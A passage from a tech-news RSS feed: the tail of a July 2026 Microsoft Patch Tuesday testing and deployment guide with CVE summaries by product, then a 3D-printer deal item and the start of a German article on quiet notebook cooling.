<p class="wp-block-paragraph">The Print Spooler flag centres on shared printers, whose queue status must track jobs accurately; the win32k flags cover 32-bit application printing, font rendering in printed and exported output, on-screen rendering, and window management; the GDI+ flags cover metafiles.</p>



<ul class="wp-block-list">
<li>Share a printer from a print server, print from a separate client in varied sizes and formats, and cancel a job, confirming the queue reflects every state change</li>



<li>Print from your 32-bit applications, and print text-heavy, graphics-heavy, and multi-page documents to physical and virtual (PDF or XPS) printers, repeating after orientation, scaling, and resolution changes</li>



<li>Export documents with varied fonts to PDF and confirm fonts and layout survive; render EMF+ files that apply effects to very large images, and convert EMF files to WMF</li>



<li>Open and close windows rapidly, drive common dialogs by mouse and keyboard, and close parents with children open – no orphaned windows</li>
</ul>



<h2 class="wp-block-heading">Storage and file systems (high risk)</h2>



<p class="wp-block-paragraph">Both NTFS high-risk flags target integrity – extended attributes, and volume recovery after an unexpected shutdown. File History carries its own high-risk flag on clients. A Windows Server 2025-only bundle across boot, <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a>, and <a href="https://learn.microsoft.com/en-us/windows-server/storage/refs/refs-overview">ReFS</a> demands the full Secure Boot/BitLocker matrix. Eight entries hit Server 2025 alone, including WSL, GPU partitioning, and a scripted Windows Server Backup pass repeating recovery after rolling the date 90 days forward.</p>



<ul class="wp-block-list">
<li>Exercise NTFS extended attributes – older-system EAs, backup workflows that preserve them, concurrent same-file operations where supported – with antivirus, encryption, or storage filters active</li>



<li>Simulate an unexpected shutdown during file activity, verify the volume mounts intact, run chkdsk, and confirm indexing, shadow copies, and backup still work</li>



<li>Run a full File History pass: back up, modify and back up again, exclude folders, change frequency, move the destination</li>



<li>On Server 2025, boot all four Secure Boot/BitLocker combinations, in standard and confidential VMs where supported</li>
</ul>



<h2 class="wp-block-heading">Devices, input and networking (high risk)</h2>



<p class="wp-block-paragraph">Three further high-risk flags land here: HID input (hidparse.sys with win32k) – touch, keyboard, mouse, touchpad, through disconnects and restarts; the WinSock bundle (afd.sys plus Bluetooth and multicast drivers); and IrDA. The heaviest ask is not high risk at all: the NetAdapterCx driver (24H2/25H2, Server 2025) wants 500-plus adapter enable-disable cycles under Driver Verifier.</p>



<ul class="wp-block-list">
<li>Run the connectivity suite: browsing, large downloads, mapped drives, an RDP session idle 30+ minutes, a Teams call, an hour of streaming, and localhost apps such as Docker or WSL</li>



<li>Stress Bluetooth: pairing, 10+ minutes of audio, input after idle, and reconnection after sleep</li>



<li>Where infrared hardware exists, transfer a file and run at least 100 connect-disconnect cycles</li>



<li>Sweep the rest: DNS Server (zone data must stay under its configured database directory), the client resolver (five entries), <a href="https://learn.microsoft.com/en-us/windows-server/networking/technologies/dhcp/dhcp-top">DHCP</a> Server (five entries), <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview">SMB</a>, <a href="https://learn.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview">NFS</a>, Message Queuing (five entries), <a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-access/remote-access">RRAS</a> administration, client VPN, and WinHTTP/WinINet consumers</li>
</ul>



<h2 class="wp-block-heading">Other windows components</h2>



<p class="wp-block-paragraph">Windows Installer itself is patched: testing should include application install, uninstall, repair, and force a rollback. <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/hyper-v-on-windows-server">Hyper-V</a> wants virtual-switch traffic as part of its testing exercises with Virtual Filtering Platform policies enforced. Sixteen media-related security entries cover playback, HEVC and MPEG-TS, USB audio, and MIDI 2.0.</p>



<h2 class="wp-block-heading">Shell hardening and LSA isolation</h2>



<p class="wp-block-paragraph">These two entries are a little different from the rest of the cycle: they ask you to confirm a security behaviour actively works, not just that nothing regressed. A pass here means the protection fired, so treat them as functional checks rather than box-ticking.</p>



<ul class="wp-block-list">
<li>Shortcut handling (windows.storage.dll; Windows 11 23H2 and earlier, plus Server 2022): drop a shortcut file carrying the <a href="https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked">Mark of the Web</a> into a folder and confirm the system refuses to extract its icon and leaks no <a href="https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview">NTLM</a> credential hash – include the zero-click paths, where the icon would otherwise render without you opening anything</li>



<li>LSA isolation and KeyGuard (24H2/25H2, Server 2025): run the supplied PowerShell validation script, which turns on <a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">Virtualization-based Security</a> if it isn’t already, exercises KeyGuard key operations in both required and best-effort isolation modes, and reports pass or fail – it needs TPM 2.0, UEFI with Secure Boot disabled, and PowerShell 7</li>



<li>Run that script on a dedicated test machine, never a shared one: it enables test signing, disables automatic updates, and reboots without asking</li>
</ul>



<h2 class="wp-block-heading">Office &amp; SharePoint</h2>



<p class="wp-block-paragraph">July’s <a href="https://learn.microsoft.com/en-us/office/">Office</a> wave is security-only; everything landed on 14 July, and nothing critical or non-security shipped in the 7 July preview. It’s an MSI-only cycle, so <a href="https://learn.microsoft.com/en-us/deployoffice/overview-office-deployment-tool">Click-to-Run</a> estates can sit this one out.</p>



<ul class="wp-block-list">
<li>On MSI Office 2016, apply the client updates – <a href="https://learn.microsoft.com/en-us/office/client-developer/excel/excel-home">Excel</a> (KB5002886), <a href="https://learn.microsoft.com/en-us/office/client-developer/word/word-home">Word</a> (KB5002890), PowerPoint (KB5002867), and five further Office 2016 security updates (<a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002273">KB5002273</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002887">KB5002887</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002748">KB5002748</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002857">KB5002857</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002830">KB5002830</a>) – then exercise macros, external data, embedded objects, and any line-of-business add-ins</li>



<li>On <a href="https://learn.microsoft.com/en-us/sharepoint/sharepoint-server">SharePoint Server</a>, patch 2016 (KB5002891, plus the KB5002892 language pack) and Subscription Edition (KB5002882), then check browser-based editing; the guidance lists SharePoint 2019 with a baseline but ships no 2019 package, so there is nothing to install there</li>
</ul>



<p class="wp-block-paragraph">Mind the rollback rules before you schedule the window: most client updates can be uninstalled, but the server updates cannot and always require a reboot.</p>



<h2 class="wp-block-heading">Developer tools &amp; databases</h2>



<p class="wp-block-paragraph">The developer estate gets a broad but low-drama sweep this month. Both .NET and SQL Server patch widely, but the ask is representative-application validation rather than anything exotic – install on the matching branch and confirm normal behaviour.</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/dotnet/core/sdk">.NET</a>: install the SDK updates (8.0.423, 9.0.316, 10.0.302, x64 and x86) and the Framework rollups spanning 3.5 through 4.8.1 – which reach from Windows Server 2012 up to Windows 11 26H1 and Server 2025 – then run a representative set of applications and confirm they function normally</li>



<li><a href="https://learn.microsoft.com/en-us/sql/sql-server/">SQL Server</a>: the <a href="https://learn.microsoft.com/en-us/troubleshoot/sql/releases/servicing-models-sql-server">GDR</a> updates span 2016 SP3 through 2025 – install each on its matching branch and test that each removes cleanly</li>



<li>Check an encrypted client connection through the separately patched Windows SQL client (dbnetlib.dll), which ships outside the server branches</li>
</ul>



<p class="wp-block-paragraph">The Readiness team recommends the following priorities for your larger enterprise deployments:</p>



<ul class="wp-block-list">
<li>Start with printing and graphics: half the high-risk flags sit in the Print Spooler, win32k, and GDI+, so regress shared printers, 32-bit printing, PDF export, metafiles, and window management before anything else</li>



<li>Take NTFS next – extended attributes and crash recovery both touch data integrity – and add a client File History backup-and-restore pass</li>



<li>Give Server 2025 its wider matrix – the Secure Boot/BitLocker combinations, WSL, GPU partitioning, and the scripted backup pass – and work through the stress suites</li>



<li>Run the scripted KeyGuard validation on any <a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">VBS</a> estate, preferably on a dedicated machine.</li>
</ul>



<p class="wp-block-paragraph">Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings:</p>



<ul class="wp-block-list">
<li>Browsers (Microsoft IE and Edge)</li>



<li>Microsoft Windows (both desktop and server)</li>



<li>Microsoft Office</li>



<li>Microsoft Exchange and SQL Server</li>



<li>Microsoft Developer Tools (Visual Studio and .NET)</li>



<li>Adobe (if you get this far)</li>
</ul>



<h2 class="wp-block-heading">Browsers</h2>



<p class="wp-block-paragraph">Edge has had a busier month than usual. Microsoft addressed 46 <a href="https://learn.microsoft.com/en-us/deployedge/microsoft-edge-for-business">Microsoft Edge</a> (Chromium-based) CVEs this cycle. None critical, but heavily weighted to remote code execution (21 entries) and spoofing (13), led by <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58289">CVE-2026-58289</a>, a remote code execution flaw. A run of further RCEs (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57981">CVE-2026-57981</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56645">CVE-2026-56645</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57974">CVE-2026-57974</a>) follows.</p>



<ul class="wp-block-list">
<li>Microsoft Edge – the Edge-specific fixes ship in the Edge stable channel (version 150.0.4078.65, released 9 July). The concentration of RCE and spoofing this month is worth a look for managed Edge estates rather than a routine wave-through.</li>



<li>Chromium upstream – 427 CVEs relayed through MSRC this cycle, spanning the weekly Chrome release cadence since the June report: use-after-free, out-of-bounds read/write, type confusion, and inappropriate-implementation flaws across V8, Dawn, ANGLE, Skia, and Tint. The same fixes ship in the Chrome Stable channel; see the <a href="https://chromereleases.googleblog.com/">Chrome releases blog</a> for the upstream notes.</li>
</ul>



<p class="wp-block-paragraph">The Chromium volume looks (quite) alarming but is routine plumbing: it flows to Edge through its own auto-update channel. Add these browser (Edge) updates to your standard release schedule for your managed environments.</p>



<h2 class="wp-block-heading">Microsoft Windows</h2>



<p class="wp-block-paragraph">Windows carries the bulk of this month’s updates: 406 CVEs, 31 rated critical and 374 important. Elevation of privilege dominates by volume (226 entries), followed by remote code execution (70), information disclosure (70), denial of service (23), and a scatter of security-feature-bypass, tampering, and spoofing entries across the following feature groupings:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/windows-server/networking/technologies/dhcp/dhcp-top">DHCP</a> – the standout network cluster: DHCP Server remote code execution (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50518">CVE-2026-50518</a>, “Exploitation More Likely,” and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56159">CVE-2026-56159</a>), with further critical DHCP Server and DHCP Client RCEs behind them (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48564">CVE-2026-48564</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50370">CVE-2026-50370</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54128">CVE-2026-54128</a>). DHCP servers are the deployment priority.</li>



<li><a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/virtual-switch">VMSwitch</a> and <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/hyper-v-on-windows-server">Hyper-V</a> – the Windows VMSwitch elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57092">CVE-2026-57092</a>) is one of the month’s highest-severity flaws, joined by two critical Hyper-V elevation-of-privilege entries (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50680">CVE-2026-50680</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54127">CVE-2026-54127</a>), guest-to-host risk on virtualisation hosts.</li>



<li>Network stack RCE – a Windows Server Network driver RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56188">CVE-2026-56188</a>, “Exploitation More Likely”), plus <a href="https://learn.microsoft.com/en-us/troubleshoot/windows-client/networking/tcpip-addressing-and-subnetting">TCP/IP</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54999">CVE-2026-54999</a>), the Reliable Multicast Transport Driver (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54982">CVE-2026-54982</a>), and SSTP (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50694">CVE-2026-50694</a>).</li>



<li>Graphics – Windows <a href="https://learn.microsoft.com/en-us/windows/win32/gdiplus/-gdiplus-overview-of-gdi--about">GDI+</a> remote code execution (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50380">CVE-2026-50380</a>) and a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/display/directx-graphics-kernel-subsystem">DirectX Graphics Kernel</a> RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50382">CVE-2026-50382</a>), both reachable through document-rendering paths.</li>



<li>Windows Media – a large cluster: three critical <a href="https://learn.microsoft.com/en-us/windows/win32/medfound/microsoft-media-foundation-sdk">Media Foundation</a> RCEs (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57090">CVE-2026-57090</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57094">CVE-2026-57094</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57087">CVE-2026-57087</a>) lead 14 Windows Media and seven Media Foundation entries overall.</li>



<li>Identity infrastructure – beyond the exploited ADFS flaw, <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview">Active Directory Domain Services</a> takes a critical RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49164">CVE-2026-49164</a>) and <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/active-directory-certificate-services-overview">Active Directory Certificate Services</a> a critical elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121">CVE-2026-54121</a>). Domain controllers take priority again.</li>



<li><a href="https://learn.microsoft.com/en-us/windows/win32/printdocs/print-spooler">Print Spooler</a>, <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus">WSUS</a>, and MSMQ – critical RCE/EoP in the Print Spooler (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58608">CVE-2026-58608</a>), <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus">Windows Server Update Services</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50444">CVE-2026-50444</a>), and <a href="https://learn.microsoft.com/en-us/windows/win32/rpc/overview-of-message-queuing-services-architecture">Message Queuing</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54992">CVE-2026-54992</a>, “Exploitation More Likely”), all server-role attack surface.</li>
</ul>



<p class="wp-block-paragraph">The <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/windows-kernel-mode-kernel-library">Windows Kernel</a> is the most-patched component (28 CVEs, seven “More Likely”), followed by <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/ntfs-overview">NTFS</a> (21), Windows Runtime (17), Windows Media (14), <a href="https://learn.microsoft.com/en-us/windows-server/storage/refs/refs-overview">ReFS</a> (12), and Win32k (15 across its two entries). Add this Windows update to your Patch Now deployment schedule.</p>



<h2 class="wp-block-heading">Microsoft Office</h2>



<p class="wp-block-paragraph">Microsoft released 96 Office CVEs this month: 19 critical, 76 important. Remote code execution leads (53 entries), ahead of information disclosure (27) and spoofing (10). <a href="https://learn.microsoft.com/en-us/sharepoint/getting-started">SharePoint</a> is the centre of gravity: it touches 39 of the 96 CVEs and supplies the family’s one actively exploited flaw.</p>



<ul class="wp-block-list">
<li>SharePoint Server: has been exploited (who would have guessed) and reaches end of support today. <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164">CVE-2026-56164</a>, an elevation of privilege, is under active exploitation. Above it sit two critical remote code execution flaws, both “Exploitation More Likely” (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50522">CVE-2026-50522</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644">CVE-2026-58644</a>) and a critical security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55040">CVE-2026-55040</a>). SharePoint Server 2016 and 2019 reach end of support on 14 July, so this exploited, critical-heavy set is the final security update those on-premises farms will receive.</li>



<li>Office has experienced a long run of critical remote code execution entries across Office, Word, and PowerPoint (among them <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55033">CVE-2026-55033</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55127">CVE-2026-55127</a> in Word, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55043">CVE-2026-55043</a> in PowerPoint, and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55018">CVE-2026-55018</a> in Office), topped by <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55045">CVE-2026-55045</a>.</li>
</ul>



<p class="wp-block-paragraph">With an exploited zero-day, two RCEs, and an end-of-support deadline all landing on SharePoint in the same cycle, SharePoint environments are the priority. Add the July Office and SharePoint updates to your Patch Now schedule.</p>



<h2 class="wp-block-heading">Microsoft Exchange and <a href="https://learn.microsoft.com/en-us/sql/sql-server/what-is-sql-server?view=sql-server-ver17">SQL Server</a></h2>



<p class="wp-block-paragraph">Both Exchange and SQL Server carry critical-rated security vulnerabilities this month. <a href="https://learn.microsoft.com/en-us/exchange/">Exchange Server</a> returns with an on-premises security update for Exchange Server Subscription Edition, the only on-premises release still supported after Exchange Server 2016 and 2019 reached end of support in October 2025; SQL Server takes two critical remote code execution flaws, one of them against SQL Server 2016, which reaches end of support on the same day.</p>



<ul class="wp-block-list">
<li>Exchange Server (on-premises) – <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55008">CVE-2026-55008</a>, a spoofing vulnerability rated critical and “Exploitation More Likely,” is the headline. Behind it, a remote code execution entry (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55005">CVE-2026-55005</a>) and two elevation-of-privilege flaws (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55006">CVE-2026-55006</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55009">CVE-2026-55009</a>) round out the on-premises set. A separate Exchange Online elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54998">CVE-2026-54998</a>, critical) is fixed service-side with no customer action.</li>



<li>SQL Server – two critical remote code execution flaws: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54117">CVE-2026-54117</a> (SQL Server 2025) and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54118">CVE-2026-54118</a> (which reaches back to SQL Server 2016 SP3), with five further important elevation-of-privilege and information-disclosure entries behind them. The 2016 exposure matters because SQL Server 2016 reaches end of support on 14 July: a critical RCE on a platform taking its final update.</li>
</ul>



<p class="wp-block-paragraph">Both belong on the Patch Now schedule this month: the Exchange on-premises update for its critical spoofing flaw, and the SQL Server update for the two critical RCEs.</p>



<h2 class="wp-block-heading">Microsoft developer tools</h2>



<p class="wp-block-paragraph">Microsoft released 24 CVEs across its developer tooling this month, all rated important. The weighting shifts from last month’s <a href="https://code.visualstudio.com/">Visual Studio Code</a> concentration toward <a href="https://learn.microsoft.com/en-us/dotnet/core/introduction">.NET</a> and <a href="https://learn.microsoft.com/en-us/aspnet/core/overview?view=aspnetcore-10.0">ASP.NET Core</a>, where a run of denial-of-service entries dominates the volume:</p>



<ul class="wp-block-list">
<li>ASP.NET Core and .NET – the two highest-severity entries are ASP.NET Core elevation-of-privilege entries (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47300">CVE-2026-47300</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47303">CVE-2026-47303</a>), ahead of a .NET security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50528">CVE-2026-50528</a>) and two .NET / .NET Framework remote code execution flaws (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50646">CVE-2026-50646</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50649">CVE-2026-50649</a>).</li>



<li><a href="https://learn.microsoft.com/en-us/visualstudio/get-started/visual-studio-ide?view=visualstudio">Visual Studio</a> and VS Code – a GitHub Copilot / Visual Studio Code security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41109">CVE-2026-41109</a>) and a second VS Code security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57102">CVE-2026-57102</a>) lead here, with a VS Code remote code execution entry behind them (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50520">CVE-2026-50520</a>) and a Visual Studio RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47305">CVE-2026-47305</a>).</li>
</ul>



<p class="wp-block-paragraph">Add these Microsoft updates to your standard developer update release schedule.</p>



<h2 class="wp-block-heading">Adobe (and third-party updates)</h2>



<p class="wp-block-paragraph">Outside Microsoft’s own catalogue, July is quiet. Adobe issued no Acrobat or Reader security updates. So, the month belongs to Microsoft, and it is a heavy one: 722 CVEs, roughly three times a normal cycle and one of the largest on record. Worth noting that this lands in the same season Microsoft has been talking up AI-assisted vulnerability management, and the AI stack it is selling as the answer, Copilot and Azure OpenAI among them, sits in the centre of this patch cycle’s own critical-rated updates. The (AI) tooling may be getting smarter, but the patch pile is (definitely) not getting smaller. This may be the beginning of an accelerating curve of ever larger patch cycles. My feeling is that we are in the middle of the beginning of this coming patch surge.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.computerworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Elegoo's emoji-branded Centauri Carbon 2 3D printer gets a price cut for World Emoji Day (yes, really) — and we called it one of the most reliable multifilament machines on the market]]></title>
<description><![CDATA[Save on one of the cheapest and most reliable 3D printers that's ever been through our workshop.]]></description>
<link>https://tsecurity.de/de/3676284/it-nachrichten/elegoos-emoji-branded-centauri-carbon-2-3d-printer-gets-a-price-cut-for-world-emoji-day-yes-really-and-we-called-it-one-of-the-most-reliable-multifilament-machines-on-the-market/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676284/it-nachrichten/elegoos-emoji-branded-centauri-carbon-2-3d-printer-gets-a-price-cut-for-world-emoji-day-yes-really-and-we-called-it-one-of-the-most-reliable-multifilament-machines-on-the-market/</guid>
<pubDate>Fri, 17 Jul 2026 16:18:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Save on one of the cheapest and most reliable 3D printers that's ever been through our workshop.]]></content:encoded>
</item>
<item>
<title><![CDATA[Was Notebooks 2026 leise macht – und warum alte Geräte plötzlich brüllen]]></title>
<description><![CDATA[Vielleicht kennen Sie das: Man sitzt konzentriert am Schreibtisch, und plötzlich klingt das Notebook wie eine startende Boeing 747. Während das eigene Gerät bei der kleinsten Excel-Tabelle aufheult, scheint der Laptop des Kollegen selbst bei Videobearbeitung keinen Mucks von sich zu geben. Woran ...]]></description>
<link>https://tsecurity.de/de/3675950/windows-tipps/was-notebooks-2026-leise-macht-und-warum-alte-geraete-ploetzlich-bruellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675950/windows-tipps/was-notebooks-2026-leise-macht-und-warum-alte-geraete-ploetzlich-bruellen/</guid>
<pubDate>Fri, 17 Jul 2026 13:57:47 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Vielleicht kennen Sie das: Man sitzt konzentriert am <a href="https://www.pcwelt.de/article/3151739/schreibtisch-richtig-einrichten.html" target="_blank" rel="noreferrer noopener">Schreibtisch</a>, und plötzlich klingt das Notebook wie eine startende Boeing 747. Während das eigene Gerät bei der kleinsten Excel-Tabelle aufheult, scheint der Laptop des Kollegen selbst bei Videobearbeitung keinen Mucks von sich zu geben. Woran liegt das? </p>



<p>Ob ein <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Notebook</a> flüsterleise arbeitet oder ständig den Lüfter anwirft, ist keine Zauberei, sondern ein Zusammenspiel aus Alter, Pflege, Software und der verbauten Hardware. Mit den folgenden Tipps machen Sie Schluss mit Lüfter-Lärm – und verstehen, warum moderne Geräte oft deutlich leiser arbeiten.</p>



<h2 class="wp-block-heading">Der Zahn der Zeit: Warum alte Geräte plötzlich zu laut sind</h2>



<p>Viele Nutzer fragen sich, warum ihr ehemals leises Notebook nach zwei oder drei Jahren plötzlich zum Schreihals mutiert. Die Antwort liegt oft nicht nur in einem einzelnen Faktor, sondern in einer Kombination aus Staub, Alterung und veränderter Leistungscharakteristik.</p>



<p>Hausstaub ist dabei tatsächlich der chronische Hauptverursacher. Laptops mit aktiver Kühlung saugen ständig Luft an, um CPU und GPU zu kühlen. Dabei gelangen feine Partikel ins Innere, die sich mit der Zeit an den Rotorblättern des Lüfters und den Lamellen der Kühlkörper absetzen. Das reduziert den Luftdurchsatz – schleichend, aber kontinuierlich.</p>



<p>Das System reagiert darauf mit höheren Lüfterdrehzahlen, weil die Temperatur schneller ansteigt oder nicht mehr effizient abgeführt wird. Zusätzlich entsteht bei vielen älteren Geräten nahezu ein <strong>Regelkreislauf aus Hitze und Lautstärke</strong>: Die CPU drosselt bei hohen Temperaturen (Thermal Throttling), kühlt daraufhin kurz ab, taktet dann aber wieder hoch – und erzeugt dadurch erneut Wärme. Das führt zum typischen Aufheulen in Wellen – mit extra Nerv-Faktor.</p>



<p>Ein oft übersehener Punkt ist auch die <strong>Alterung der <a href="https://www.pcwelt.de/article/1154408/kuehlleistung-stabil-halten-cpu-waermeleitpaste-richtig-auftragen.html" target="_blank" rel="noreferrer noopener">Wärmeleitpaste</a></strong> zwischen Prozessor und Kühleinheit. Diese Paste trocknet aus und verliert über die Jahre ihre gleichmäßige Wärmeverteilung. Dadurch entstehen lokale Hotspots, die den Lüfter zusätzlich fordern. Ein fachgerechter Austausch kann die Temperaturen je nach Gerät deutlich senken – in manchen Fällen um bis zu 10 Grad oder mehr.</p>



<p>Auch die Firmware spielt eine Rolle: Bei älteren Notebooks sind die hinterlegten Lüfterkurven oft konservativer eingestellt als bei heutigen Geräten. Das bedeutet: Der Lüfter springt früher und aggressiver an, um thermische Spitzen zu vermeiden. Solche Einstellungen nimmt man übrigens am besten <a href="https://www.pcwelt.de/article/2945534/neues-notebook-windows-11-einrichten-checkliste.html" target="_blank" rel="noreferrer noopener">direkt nach dem Kauf eines neuen Gerätes vor.</a></p>



<h2 class="wp-block-heading toc">Macht das Reinigen des Laptop-Inneren Sinn?</h2>



<p>Die kurze Antwort: Das macht auf jeden Fall Sinn – in vielen Fällen ist es sogar die effektivste Maßnahme bei älteren Geräten.</p>



<p><strong>Schnellreinigung:</strong> Mit Druckluftspray vorsichtig durch die Lüftungsschlitze pusten. <strong>Wichtig</strong>: Den Lüfter dabei möglichst fixieren, damit er sich nicht unkontrolliert durch den Luftstrom dreht – das kann ihn unnötig belasten. Druckluft hat dabei den Vorteil, dass sie in Strömungsrichtung des Kühlsystems arbeitet und den Staub so aus dem Gerät heraus transportiert. Alternativ lassen sich Staubablagerungen an den Lüftungsgittern auch vorsichtig mit einem Staubsauger auf niedriger Stufe von außen entfernen.</p>



<p><strong>Die gründliche Reinigung:</strong> Bei vielen Geräten lässt sich die Bodenplatte relativ einfach entfernen. Im Inneren kann der Staub dann mit einem weichen Pinsel oder einem antistatischen Sauger direkt an Kühlkörper und Lüfter entfernt werden. Besonders die feinen Lamellen setzen sich dort oft vollständig zu, ohne dass man es von außen sieht. Lesen Sie dazu auch unseren Ratgeber “<a href="https://www.pcwelt.de/article/2581644/pc-laptop-richtig-reinigen.html" target="_blank" rel="noreferrer noopener">So reinigen Sie PC und Laptop richtig</a>“.</p>



<h2 class="wp-block-heading toc">Software-Tools als unsichtbare Lüfter-Dirigenten</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5a18adb0d1d"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Fan-Control-Homepage.png?w=1200" alt="Fan Control Homepage" class="wp-image-3170793" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
